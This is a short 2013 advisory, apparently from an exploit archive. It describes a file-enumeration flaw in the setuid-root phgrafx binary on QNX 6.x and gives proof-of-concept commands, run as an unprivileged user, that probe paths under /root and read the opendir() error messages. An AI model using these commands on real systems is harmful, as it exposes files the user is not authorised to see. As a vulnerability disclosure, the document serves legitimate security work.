# QNX 6.x phgrafx file enumeration vulnerability by cenobyte 2013 # # # - vulnerability description: # QNX setuid root /usr/photon/bin/phgrafx allows any non-root user to enumerate # files and directories due to opendir() messages. # # - vulnerable platforms: # QNX 6.5.0SP1 # QNX 6.5.0 # QNX 6.4.1 # QNX 6.3.0 # QNX 6.2.0 # # - note: # Leveraging this on QNX versions <= 6.3.0 will result in a core dump. $ id uid=100(user) gid=100 # directory /root/.ph exists: $ /usr/photon/bin/phgrafx -d /root/.ph load_display_conf(): No such file or directory # file /root/.profile exsts: $ /usr/photon/bin/phgrafx -d /root/.profile /root/.profile: opendir(): Not a directory load_display_conf(): Not a directory # /root/doesnotexist does not exist: $ /usr/photon/bin/phgrafx -d /root/doesnotexist /root/doesnotexist: opendir(): No such file or directory load_display_conf(): No such file or directory